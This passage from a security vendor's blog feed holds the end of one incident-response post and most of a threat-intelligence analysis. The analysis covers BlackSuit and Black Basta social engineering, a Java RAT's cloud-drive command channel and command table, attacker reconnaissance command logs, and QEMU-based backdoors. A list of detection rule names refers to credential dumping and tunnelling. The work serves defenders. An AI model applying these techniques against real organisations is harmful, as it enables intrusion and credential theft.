style='font-size: undefined;'> for IoCs and additional rule logic that can be applied.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Below is a non-exhaustive list of detections that are deployed and will alert on the behaviors discussed in this blog:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Process — SMB Activity Spike over Cloudflared Tunnel (cloudflared.exe)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Process — RDP Session over New Cloudflared Tunnel (cloudflared.exe)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Attacker Technique — Plink Redirecting RDP</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Attacker Technique — Plink Redirecting SMB/CIFS</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Lateral Movement — SSH Connection to Remote IP using Plink.exe</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Endpoint Detection — Registry Dump File Written to TEMP Directory</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Credential Dumping — Reg.exe Exporting Security, System or SAM Registry Keys</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Brute Force — Failed Authentication Attempts Against Domain Account</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>PowerShell — Base64/Gzip Script Content</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Collection — WinRAR Multi Filter Archive</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Attacker Technique — Suspicious Nltest Execution via RDP</span></p></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/innovative-tunnelling-and-forensic-tool-abuse-ir-tales-from-the-field</link>
      <guid isPermaLink="false">blt91720d4370e02a2b</guid>
      <category><![CDATA[Incident Response]]></category>
      <category><![CDATA[Detection and Response]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Mon, 14 Jul 2025 14:08:06 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb655c1b69f13c73b/6846a711536b63f12ca5f649/incident-response-findings-2025.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[BlackSuit Continues Social Engineering Attacks in Wake of Black Basta’s Internal Conflict]]></title>
      <description><![CDATA[<h2>Executive Summary</h2><p>There has been a significant decrease in social engineering attacks linked to the Black Basta ransomware group since late December 2024. This lapse also included the <a href="https://github.com/D4RK-R4BB1T/BlackBasta-Chats/">leaked Black Basta chat logs in February 2025</a>, indicating internal conflict within the group. Despite this, Rapid7 has observed sustained social engineering attacks. Evidence now suggests that BlackSuit affiliates have either adopted Black Basta’s strategy or absorbed members of the group. The developer(s) of a previously identified Java malware family, distributed during social engineering attacks, have now been assessed as likely initial access brokers, having potentially provided historical access for Black Basta and/or FIN7 affiliates.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt412b8856b67fb99c/684c3af344bc4a205ca88a7c/blog-confirmed-malicious-chat-requests.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-confirmed-malicious-chat-requests.png" asset-alt="blog-confirmed-malicious-chat-requests.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt412b8856b67fb99c/684c3af344bc4a205ca88a7c/blog-confirmed-malicious-chat-requests.png" data-sys-asset-uid="blt412b8856b67fb99c" data-sys-asset-filename="blog-confirmed-malicious-chat-requests.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-confirmed-malicious-chat-requests.png" sys-style-type="display"/><em>Figure 1. Confirmed malicious chat requests, Feb 12 through May 7, as observed by Rapid7.</em><p></p><h2>Overview</h2><p>The first stage of the attack remains the same. The operator will flood targeted users with a high volume of emails, to the order of thousands per hour. This is often accomplished by signing the target user’s email up to many different publicly available mailing lists at once, effectively creating a denial of service attack when each service sends a welcome email. This technique is commonly known as an email bomb.</p><p>Following the email bomb, the strategy then splits between operators, though they all ultimately reach out to impacted users pretending to be a member of the targeted organization’s help desk. The majority of operators still perform this step via Microsoft Teams using either a default Azure/Entra tenant (i.e., email account ends with <span data-type='inlineCode'>onmicrosoft[.]com</span>) or their own custom domain. In rare cases however, operators, particularly those affiliated with BlackSuit, may forgo Microsoft Teams in favor of calling the targeted users directly with a spoofed number. This strategy, if successful, allows them to circumvent the cloud logging that would be recorded otherwise. For the first time, an explanation of the process written by Black Basta’s leader is also available for a summary of the process, in the context of explaining the attack to a new affiliate:</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5025df00dffa3e89/684c3af26a67a9de725a3bdc/blog-chat-logs.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-logs.png" asset-alt="blog-chat-logs.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5025df00dffa3e89/684c3af26a67a9de725a3bdc/blog-chat-logs.png" data-sys-asset-uid="blt5025df00dffa3e89" data-sys-asset-filename="blog-chat-logs.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-logs.png" sys-style-type="display"/><em></em></p><p><em>Figure 2. Black Basta’s leader explains the social engineering attack. Additional chat logs with translations are </em><a href="https://github.com/rapid7/Rapid7-Labs/blob/main/IOCs/blacksuit_socialengineering/bbchat1.txt"><em>available at the Rapid7 GitHub repository</em></a><em></em></p><p>If the affiliate is able to gain the user’s confidence, they will still primarily attempt to gain access to the user’s asset — and thereby the corporate network — via Quick Assist. Quick Assist is a built-in Windows utility that allows a user to easily grant remote access to their computer to a third party. The utility has been widely abused for social engineering attacks, a trend which continues. BlackSuit affiliates in particular may also direct the user to a malicious domain that hosts a fake Quick Assist login page, for the purpose of harvesting their credentials.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd7ad72422c5d03e7/684c3af2950a571891af0a65/blog-ms-login.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-ms-login.png" asset-alt="blog-ms-login.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd7ad72422c5d03e7/684c3af2950a571891af0a65/blog-ms-login.png" data-sys-asset-uid="bltd7ad72422c5d03e7" data-sys-asset-filename="blog-ms-login.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-ms-login.png" sys-style-type="display"/></p><p><em>Figure 3. Fake Quick Assist login page, functions as a credential harvester.</em></p><p>In cases where the affiliate is unable to get Quick Assist to work, they will still cycle through a variety of other popular remote access tools (e.g., AnyDesk, ScreenConnect), and if that still doesn’t work, they may simply hang up on the user and move on to the next target.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt31adcfe358e4991e/684c3af2343886387b2ceed5/blog-chat-logs-2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-logs-2.png" asset-alt="blog-chat-logs-2.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt31adcfe358e4991e/684c3af2343886387b2ceed5/blog-chat-logs-2.png" data-sys-asset-uid="blt31adcfe358e4991e" data-sys-asset-filename="blog-chat-logs-2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-logs-2.png" sys-style-type="display"/><em>Figure 4. One of Black Basta’s operators discusses their strategy regarding remote access tools.</em><p></p><p>Black Basta had at least one caller template/script for this purpose:</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2691246333c44510/684c3af23ef1e75ef7697bf0/blog-chat-logs-3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-logs-3.png" asset-alt="blog-chat-logs-3.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2691246333c44510/684c3af23ef1e75ef7697bf0/blog-chat-logs-3.png" data-sys-asset-uid="blt2691246333c44510" data-sys-asset-filename="blog-chat-logs-3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-logs-3.png" sys-style-type="display"/><em>Figure 5. A call script used by Black Basta’s operators. The full script is </em><a href="https://github.com/rapid7/Rapid7-Labs/blob/main/IOCs/blacksuit_socialengineering/bbchat_call_script.txt"><em>available at the Rapid7 GitHub repository.</em></a><em></em></p><p></p><p>Quickly obtaining reliable access to the target network is still the top priority in the early stages of the attack, typically facilitated by stealing the targeted user’s credentials. In the past this has been achieved, for example, via a QR code sent to the target user via Microsoft Teams or the download and execution of malware which creates a fake Windows authentication prompt.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt98e0c324fe9ac0df/684c3af25bb3f86152a3b2df/blog-chat-logs-4.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-logs-4.png" asset-alt="blog-chat-logs-4.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt98e0c324fe9ac0df/684c3af25bb3f86152a3b2df/blog-chat-logs-4.png" data-sys-asset-uid="blt98e0c324fe9ac0df" data-sys-asset-filename="blog-chat-logs-4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-logs-4.png" sys-style-type="display"/><em></em><p><em>Figure 6. One of Black Basta’s operators discusses the usage of QR codes for credential harvesting.</em></p><p>In some cases the operator who makes the initial call may also coerce the target user to provide an MFA code while still on the phone. Historically, operators will also attempt to steal VPN configuration files once remote access is established, which can allow them to authenticate directly to the network if the compromised user account is not remediated.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta12b1e32812beda6/684c3af22847d348c3b10711/blog-chat-log-5.png" height="143" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-log-5.png" asset-alt="blog-chat-log-5.png" inline="true" width="428" max-width="428" max-height="143" style="max-width: 428px; width: 428px; max-height: 143px; height: 143px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta12b1e32812beda6/684c3af22847d348c3b10711/blog-chat-log-5.png" data-sys-asset-uid="blta12b1e32812beda6" data-sys-asset-filename="blog-chat-log-5.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-log-5.png" sys-style-type="display"/><p><em>Figure 7. One of Black Basta’s operators discusses using stolen credentials to authenticate directly to the VPN for the targeted environment.</em></p><p>After the affiliate has successfully gained access they will typically transfer and execute malware on the compromised system. The specific malware differs per operator and typically marks the stage in which the access is passed from the caller to an operator within the group who specializes in what they refer to as “pentesting.” To facilitate the access, the operator who calls typically coordinates with the “pentester” to increase the chances of success. At this point in the attack the affiliate who called the user has already hung up under the guise of having fixed the spam problem, and the “pentester” then begins to enumerate the environment. Rapid7 has observed <a href="https://attack.mitre.org/techniques/T1558/004/">AS-REP</a> and <a href="https://attack.mitre.org/techniques/T1558/003/">Kerberoasting</a> attacks to be commonly attempted along with Active Directory Certificate Services (ADCS) abuse and other types of brute force password attacks.</p><h2>Technical Analysis</h2><p>After initial access has been achieved, the follow-on malware payloads that are downloaded to the compromised system and executed differ, per operator.</p><h3>Java RAT</h3><p>A large volume of social engineering incidents handled by Rapid7 have resulted in a Java RAT being downloaded and executed. This tactic was first observed by Rapid7 during October of 2024, and <a href="https://www.rapid7.com/blog/post/2024/12/04/black-basta-ransomware-campaign-drops-zbot-darkgate-and-custom-malware/">initially reported on in December 2024</a> in relation to the payload identity.jar. The first samples of the Java RAT observed by Rapid7 only utilized Microsoft OneDrive with optional proxy servers (e.g., SOCKS5) for a more direct C2 connection. The configuration was left in plain text, and did not contain any functionality to dynamically update or encrypt the configuration, primarily functioning only as a RAT via PowerShell session commands.</p><p>In the past 6+ months, development of the Java malware payload has continued to add/change numerous features. The Java malware now abuses cloud-based file hosting services provided by both Google and Microsoft to proxy commands through the respective cloud service provider’s (CSP) servers. Over time, the malware developer has shifted away from direct proxy connections (i.e., the config option is left blank or not present), towards OneDrive and Google Sheets, and most recently, towards simply using Google Drive. The logic of the RAT is obfuscated using various types of junk code, control flow obfuscation, and string obfuscation in an attempt to impede analysis.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd9b92ee829f79635/684c3afe5d16435292ae8190/blog-chat-log-6.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-log-6.png" asset-alt="blog-chat-log-6.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd9b92ee829f79635/684c3afe5d16435292ae8190/blog-chat-log-6.png" data-sys-asset-uid="bltd9b92ee829f79635" data-sys-asset-filename="blog-chat-log-6.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-log-6.png" sys-style-type="display"/><p><em>Figure 8. Obfuscated logic within the Java RAT, where three simple statements become dozens of lines and indentations.</em></p><p>The Java RAT and other payloads are distributed within an archive, the link for which is most often sent to the target user via a <span data-type='inlineCode'>pastebin[.]com</span> link. In cases as recent as May of 2025, Rapid7 has observed that the archives are still being publicly hosted on potentially compromised SharePoint instances. The archive and the payloads within are named to fit the initial social engineering lure. For example, in a recent incident, the archive was named <span data-type='inlineCode'>Email-Focus-Tool.zip</span>, likely to help prevent suspicion by the targeted user during the attack. The archive contains a <span data-type='inlineCode'>.jar</span> file (the Java RAT), a copy of required JDK dependencies contained within a child folder, and at least one <span data-type='inlineCode'>.lnk</span> file intended to make the malware easy to execute.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta21c4b18282d384c/684c3afebe25df2c0c4e2c92/blog-chat-log-7.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-log-7.png" asset-alt="blog-chat-log-7.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta21c4b18282d384c/684c3afebe25df2c0c4e2c92/blog-chat-log-7.png" data-sys-asset-uid="blta21c4b18282d384c" data-sys-asset-filename="blog-chat-log-7.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-log-7.png" sys-style-type="display"/><p><em>Figure 9. The contents of an archive delivered by the threat actor and a `log.txt` file containing enumeration command output.</em></p><p>The archive is most often extracted to the staging directory <span data-type='inlineCode'>C:\ProgramData\</span> prior to execution. In at least one case, Rapid7 has also observed the operator who initiated the attack outputting system enumeration data to a plaintext file in the same directory, a technique commonly used in the past by Black Basta. Historically, this is information that they share during the initial stages of the attack to assess the network and the type of defenses they may have to deal with. For example, shown above, the operator who initially accessed the compromised asset spawned a command prompt and redirected the output of the <span data-type='inlineCode'>ipconfig /all</span> and <span data-type='inlineCode'>tasklist</span> commands to the file <span data-type='inlineCode'>log.txt</span>.</p><p>Most recent versions of the Java RAT have the capability to use Google Sheets to dynamically update the stored C2 configuration, which includes a Google spreadsheet ID (SSID), proxy server IPv4 addresses, application credentials (OneDrive), and/or service account credentials (Google Drive). At least one of the Google Spreadsheets used in this way was observed by Rapid7 to have been taken down by Google, which highlights the potential unreliability of using certain cloud services as a malware traffic proxy.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcabd56d810929919/684c3ee23e700fcd056dc2d5/google-spreadsheet.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="google-spreadsheet.png" asset-alt="google-spreadsheet.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcabd56d810929919/684c3ee23e700fcd056dc2d5/google-spreadsheet.png" data-sys-asset-uid="bltcabd56d810929919" data-sys-asset-filename="google-spreadsheet.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="google-spreadsheet.png" sys-style-type="display"/><p><em>Figure 10. A Google spreadsheet used by the malware for dynamic configuration updates was taken down by Google.</em></p><p>One of the first actions taken by the malware on launch is to check for an existing configuration in the user’s registry, and if it is not already present, the copy included within the <span data-type='inlineCode'>.jar</span> payload, contained within the file <span data-type='inlineCode'>config.json</span>, is written there. All samples analyzed by Rapid7 did not have debugging messages removed, allowing them to be viewed by simply executing the <span data-type='inlineCode'>.jar</span> file in a console window, as all the debugging messages are written to stdout.</p><p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f24a7659026b9be/684c3afe4a1597ebc2db69b5/blog-code.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code.png" asset-alt="blog-code.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f24a7659026b9be/684c3afe4a1597ebc2db69b5/blog-code.png" data-sys-asset-uid="blt5f24a7659026b9be" data-sys-asset-filename="blog-code.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code.png" sys-style-type="display"/></p><p><em>Figure 11. Debug statement output after executing the Java RAT via console.</em></p><p>The registry value name(s) and content for the stored config are both base64 encoded (e.g., <span data-type='inlineCode'>HKCU\SOFTWARE\FENokuuTCyVq\JJSUP0CEcUw9PENaNduhsA==</span>), with the decoded configuration content being encrypted using AES-256-ECB. The encryption key is derived from a seed that is stored as a 16 byte string within a file named <span data-type='inlineCode'>ek</span> (encryption key), that is contained within the <span data-type='inlineCode'>.jar</span> archive. The registry key name, a randomized alphabetic string, is hard coded and stored in a similar manner within the file <span data-type='inlineCode'>r_path</span> (registry path). The malware creates a SHA256 hash of the encryption key seed string, and the first 32 bytes of the SHA256 hash are then used as the AES-256-ECB key to encrypt and decrypt the malware’s configuration. Every sample analyzed by Rapid7 contained a unique key seed, though a particular sample is often distributed (within the related archive) to multiple targets for an extended period of time, often around a couple weeks.</p><p>After checking and loading the configuration from the registry, local resource, or updated configuration, the RAT will then establish at least one PowerShell session.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd9cb13c5fe9958c6/684c3f736bd1c8839aeb2acc/blog-folders.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-folders.png" asset-alt="blog-folders.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd9cb13c5fe9958c6/684c3f736bd1c8839aeb2acc/blog-folders.png" data-sys-asset-uid="bltd9cb13c5fe9958c6" data-sys-asset-filename="blog-folders.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-folders.png" sys-style-type="display"/><p><em>Figure 12. Example process tree for the Java RAT.</em></p><p>The stdin and stdout for the PowerShell console are used to process remote commands. The commands sent to the Java RAT are proxied through the respective CSP by the malware creating two specific files within the cloud drive. The name of the files all contain the UUID of the infected asset, which is retrieved at the malware’s startup. There are two prefixes added onto the primary communication files, <span data-type='inlineCode'>cf_</span> and <span data-type='inlineCode'>rf_</span> which contextually appear to stand for create file and receive file, respectively. These two files correspond to the standard output (stdin) and standard input (stdin) of the PowerShell console. The malware uses the input file in two major ways. If the <span data-type='inlineCode'>cf_</span> file (stdin) starts with a specific command string, the content following it will be processed by the malware to execute functionality implemented by the malware developer.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt852690a7e3373f60/684c3afe97300935f06c3c87/blog-code-2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-2.png" asset-alt="blog-code-2.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt852690a7e3373f60/684c3afe97300935f06c3c87/blog-code-2.png" data-sys-asset-uid="blt852690a7e3373f60" data-sys-asset-filename="blog-code-2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-2.png" sys-style-type="display"/><p><em>Figure 13. The logic for the `loginform` command within the if-else command processing chain used by the Java RAT. The malware developer did not update one of the debug statements for Google Drive.</em><br/>Otherwise, the content will be executed as a regular PowerShell command.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted0af96081b9b569/684c3afe851a769e29f6bff0/blog-code-3.png" height="223" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-3.png" asset-alt="blog-code-3.png" inline="true" width="508" max-width="508" max-height="223" style="max-width: 508px; width: 508px; max-height: 223px; height: 223px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted0af96081b9b569/684c3afe851a769e29f6bff0/blog-code-3.png" data-sys-asset-uid="blted0af96081b9b569" data-sys-asset-filename="blog-code-3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-3.png" sys-style-type="display"/><p><em>Figure 14. The default case in the if-else chain executes the command string via PowerShell.</em></p><p></p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt07d285d9a2988502/684c3b6efcecfa3c69a2f047/blog-code-4.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-4.png" asset-alt="blog-code-4.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt07d285d9a2988502/684c3b6efcecfa3c69a2f047/blog-code-4.png" data-sys-asset-uid="blt07d285d9a2988502" data-sys-asset-filename="blog-code-4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-4.png" sys-style-type="display"/><p><em>Figure 15. The 'execute()' function within the same class executes the command string as a PowerShell command via jPowerShell.</em></p><p></p><table><colgroup data-width='803'><col style="width:39.10336239103363%"/><col style="width:60.89663760896637%"/></colgroup><thead><tr><th><p>Command</p></th><th><p>Function</p></th></tr></thead><tbody><tr><td><p>send</p></td><td><p>Send a file from the operator’s machine to the infected machine.</p></td></tr><tr><td><p>recive</p></td><td><p>Upload a file from the infected machine to the relevant cloud drive. The command string includes a typo made by the developer.</p></td></tr><tr><td><p>extract</p></td><td><p>Extract a specified file archive.</p></td></tr><tr><td><p>loginform</p></td><td><p>Present a fake login prompt to the user. Entered credentials are validated locally, and if correct, are uploaded to the operator’s machine through the cloud drive. The username must be specified by the operator.</p></td></tr><tr><td><p>newconfig</p></td><td><p>Replace the existing configuration with one retrieved from Google Sheets.</p></td></tr><tr><td><p>checkconfig</p></td><td><p>Check Google Sheets using the SSID to see if an update is available.</p></td></tr><tr><td><p>startsocks5</p></td><td><p>Initiate a Socks5 proxy tunnel using python.</p></td></tr><tr><td><p>steal</p></td><td><p>Attempt to decrypt and steal stored browser database information. (e.g., credentials)</p></td></tr><tr><td><p>screen</p></td><td><p>Given a supplied URL, download and execute a Java class in memory.</p></td></tr></tbody></table><p>Table 1. Command key for the Java RAT.</p><p>The <a href="https://www.rapid7.com/blog/post/2024/12/04/black-basta-ransomware-campaign-drops-zbot-darkgate-and-custom-malware/">previously seen</a> credential harvesting payload, <span data-type='inlineCode'>identity.jar</span>, has now also been integrated into the Java RAT, and instead of writing the entered credentials to a randomly named file within the working directory, the RAT sends it to the cloud drive C2 file that has been designated to the compromised host. This functionality is executed by the operator by sending the <span data-type='inlineCode'>loginform</span> (the Java class is abbreviated as “Lf”) command to the RAT via the cloud drive file. After decompiling and deobfuscating the Java code that the module consists of, it can be cleaned up, recompiled, and executed as a standalone program. This allows us to see that the appearance of the module to the targeted user is the same, including the fake “Windows Security” title. A review of the code indicates that it has not changed in any other significant way. The harvester still forces the active window on top and will not let the user close the window without entering their password or forcibly terminating the process.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6227f96ec6ae7d20/684c3b6e260f53589861451d/blog-code-5.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-5.png" asset-alt="blog-code-5.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6227f96ec6ae7d20/684c3b6e260f53589861451d/blog-code-5.png" data-sys-asset-uid="blt6227f96ec6ae7d20" data-sys-asset-filename="blog-code-5.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-5.png" sys-style-type="display"/><em>Figure 16. The credential harvesting window used by the Java RAT.</em><p></p><p>As a result of the cloud service credentials being stored within the malware payload, and that, for example, Google Drive stores a revision history for every created file by default, it is possible to view the entire history of commands sent to each infected asset, including stdin and stdout.<br/>This gives a unique in console view of what the threat actor saw while they were hands-on-keyboard and executing commands. Command log snippets can be seen below, with identifying information redacted. Once access is established, the operator nearly always verifies the user’s name with the <span data-type='inlineCode'>dir</span> command and then uses this information to execute the <span data-type='inlineCode'>loginform</span> command, as the malware does not retrieve the executing user’s name on its own.</p><p><span data-type='inlineCode'>Infected Host GUID: 4C4C4544-0038-4610-8036-B6C04F394733 2025-04-24T16:53:34.038Z: dir c:\users\ 2025-04-24T16:54:47.967Z: loginform &lt;username&gt; 3 2025-04-24T18:40:36.584Z: net time 2025-04-24T18:42:54.426Z: whoami 2025-04-24T18:43:48.284Z: net user &lt;username&gt; /domain 2025-04-24T18:48:35.089Z: hostname 2025-04-24T18:49:57.182Z: net group "Domain Computers" /domain 2025-04-24T18:50:56.578Z: net time 2025-04-24T19:17:14.259Z: ipconfig /all 2025-04-24T19:19:44.442Z: hostname</span></p><p><span data-type='inlineCode'>Infected Host GUID: 594045B3-008B-4106-8FF4-B850DF6C76D0 2025-04-24T17:20:09.896Z: dir c:\users\ 2025-04-24T17:20:58.179Z: loginform &lt;username&gt; 3 2025-04-24T17:36:52.542Z: wmic qfe list brief 2025-04-24T17:40:13.454Z: net time 2025-04-24T17:41:26.860Z: ping -n 2 &lt;domain_controller_hostname&gt; 2025-04-24T17:49:08.598Z: net group "Domain Computers" /domain &gt; c:\users\public\001.txt</span></p><p>In some cases, Rapid7 has observed a command log gap ranging from around 4 to 12 days, beginning after the RAT is successfully executed and the user’s credentials have been stolen. In some cases an SSH tunnel is also established before activity stops. This type of behavior indicates that the threat actor may not be intending to use the access for themselves, but rather sell it to another group that specializes in fully compromising the network towards various ends (e.g., data theft, extortion, ransomware). Rapid7 has also observed the access being used to test new malware payloads and functionality, rather than progress the compromise within the targeted networks.</p><h3>Qemu</h3><p>In a smaller volume of incidents handled by Rapid7, operators have been observed sending the user a Google Drive link to download a zip archive containing QEMU (Quick Emulator) and its dependencies, including a custom made <span data-type='inlineCode'>.qcow2</span> (QEMU Copy-On-Write version 2) virtual disk image. The image contains a Windows 7 Ultimate virtual machine (VM) configured to automatically logon and execute a RunOnce registry key that launches a ScreenConnect installer. In most cases a link to a fake Quick Assist login page (credential harvester) was also delivered to the targeted user by proxy via a self-destructing link service such as <span data-type='inlineCode'>1ty[.]me</span> alongside the Google Drive zip archive link.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltdf8087b069488343/684c3aff96cee07264183bc7/blog-code-6.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-6.png" asset-alt="blog-code-6.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltdf8087b069488343/684c3aff96cee07264183bc7/blog-code-6.png" data-sys-asset-uid="bltdf8087b069488343" data-sys-asset-filename="blog-code-6.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-6.png" sys-style-type="display"/><em>Figure 17. Evidence left in the .qcow2 image, including a ScreenConnect installer, registry command, and QDoor malware.</em><p></p><p>Once the remote session is established in this way, the VM also contains a copy of QDoor, Rust malware that functions as a C2 proxy, which allows the the threat actors to tunnel C2 traffic through a proxy to the VM, on the infected machine in the target user’s environment. In all cases handled by Rapid7, the QEMU executable was renamed (e.g., <span data-type='inlineCode'>w.exe</span><span data-type='inlineCode'>/</span><span data-type='inlineCode'>svvhost.exe</span>), and, as the emulator of the VM, it is the source on the infected host machine for all network connections resulting from processes running inside the VM. QDoor malware has been attributed to the BlackSuit ransomware group by <a href="https://www.linkedin.com/pulse/qdoor-new-backdoor-tool-blacksuits-arsenal-connectwise-uwvhc">ConnectWise</a>.</p><p>In more recent cases, Rapid7 has observed the BlackSuit affiliates distributing a much smaller (64MB vs. 8.6GB) <span data-type='inlineCode'>.qcow2</span> image that contains TinyCore Linux. When the image is loaded by QEMU, the <span data-type='inlineCode'>bootlocal[.]sh</span> script that is executed upon startup of the TinyCore OS has been set by the threat actors to sleep unless a successful ping is made to one of their servers. Once the ping is successful, an ELF file, <span data-type='inlineCode'>123.out</span> is executed which attempts to connect to a C2 server.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcfd43f41bb848fac/684c3b6e37c391988b22c073/blog-code-7.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-7.png" asset-alt="blog-code-7.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcfd43f41bb848fac/684c3b6e37c391988b22c073/blog-code-7.png" data-sys-asset-uid="bltcfd43f41bb848fac" data-sys-asset-filename="blog-code-7.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code-7.png" sys-style-type="display"/><em>Figure 18. The contents of `bootlocal[.]sh within the TinyCore VM`</em><p></p><p>Within the command log of the VM image, .ash_history, a wget command is also present which indicates the external server that the <span data-type='inlineCode'>123.out</span> file was originally downloaded to the VM from.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt275a4221104818db/684c3b6e44bc4a6d61a88a84/blog-code-8.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code-8.png" asset-alt="blog-code-8.png" inline="true" style="width: auto" 